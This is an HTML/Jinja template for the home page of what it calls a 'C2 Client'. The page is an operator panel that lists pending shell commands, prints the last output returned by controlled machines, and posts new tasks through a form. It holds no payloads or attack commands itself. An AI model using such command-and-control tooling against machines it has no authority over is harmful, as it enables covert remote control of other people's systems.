<!DOCTYPE html>
<html lang="en">

<head>

    <title>C2 Client Home</title>

</head>

<body>
    {% if name %}
        <h1>Hello {{ name }}!</h1>
    {% endif %}
    <main class="container p-4">
    <div class="container">
  <div class="row justify-content-md-center">
    <pre class="ascii align-items-center" size="5px">
       ____                              _      _     _                                  _               
      |  _ \                            | |    | |   | |                                | |            _ 
      | |_) | _ __   ___   _   _   __ _ | |__  | |_  | |_   ___    _   _   ___   _   _  | |__   _   _ (_)
      |  _ < | '__| / _ \ | | | | / _` || '_ \ | __| | __| / _ \  | | | | / _ \ | | | | | '_ \ | | | |   
      | |_) || |   | (_) || |_| || (_| || | | || |_  | |_ | (_) | | |_| || (_) || |_| | | |_) || |_| | _ 
      |____/ |_|    \___/  \__,_| \__, ||_| |_| \__|  \__| \___/   \__, | \___/  \__,_| |_.__/  \__, |(_)
                                   __/ |                            __/ |                        __/ |   
                                  |___/                            |___/                        |___/    
       __  __         _               ___   ___    ___     _____                      
      |  \/  |       | |             / _ \ |__ \  / _ \   / ____|                     
      | \  / | _   _ | |  ___  ___  | (_) |   ) || | | | | |  __   __ _  _ __    __ _ 
      | |\/| || | | || | / _ \/ __|  \__, |  / / | | | | | | |_ | / _` || '_ \  / _` |
      | |  | || |_| || ||  __/\__ \    / /  / /_ | |_| | | |__| || (_| || | | || (_| |
      |_|  |_| \__, ||_| \___||___/   /_/  |____| \___/   \_____| \__,_||_| |_| \__, |
                __/ |                                                            __/ |
               |___/                                                            |___/                                                              
    </pre>
  </div>
    </div>
        <div class="row">

            <div class="col-sm offset-sm my-auto center">

		    <div class=fakeMenu>
  <div class="fakeButtons fakeClose"></div>
  <div class="fakeButtons fakeMinimize"></div>
  <div class="fakeButtons fakeZoom"></div>
</div>
<div class="fakeScreen">
  <p class="line1">Commands:</p>
  {% if commands %}
    {% for command in commands %}
        {% if command.done == False %}  
            <p class="line1"> ~$ {{command.cmd}}</p>
        {% endif %}
    {% endfor %}
  {% endif %}

          <p class="line1">Last output:</p>
  {% for n_line in returns.split('\n') %}
          <p class="line1">{{n_line}} <span class="cursor4">_</span></p>
  {% endfor %}

  <form action="/create-task" method="POST">
     <input type="text" name="content" placeholder="Task" autofocus>
  </form>
</div>
                    <div class="card-body">
                        <ul class="list-group">
                            {% for task in commands %}
                            <li class="list-group-item">
                                <span class="{% if task.done %} done {% endif %}">{{task.cmd}}</span> <a
                                    href="/done/{{task.id}}" class="btn btn-success btn-sm">Done</a>
                                <a href="{{url_for('delete', id=task.id)}}" class="btn btn-danger btn-sm">Delete</a>
                            </li>
                            {% endfor %}
                        </ul>
                    </div>
            </div>

        </div>
    </main>

    <a href='/logout'>Logout</a>
</body>
<!-- 
	N0vart1s Inc.
-->
</html>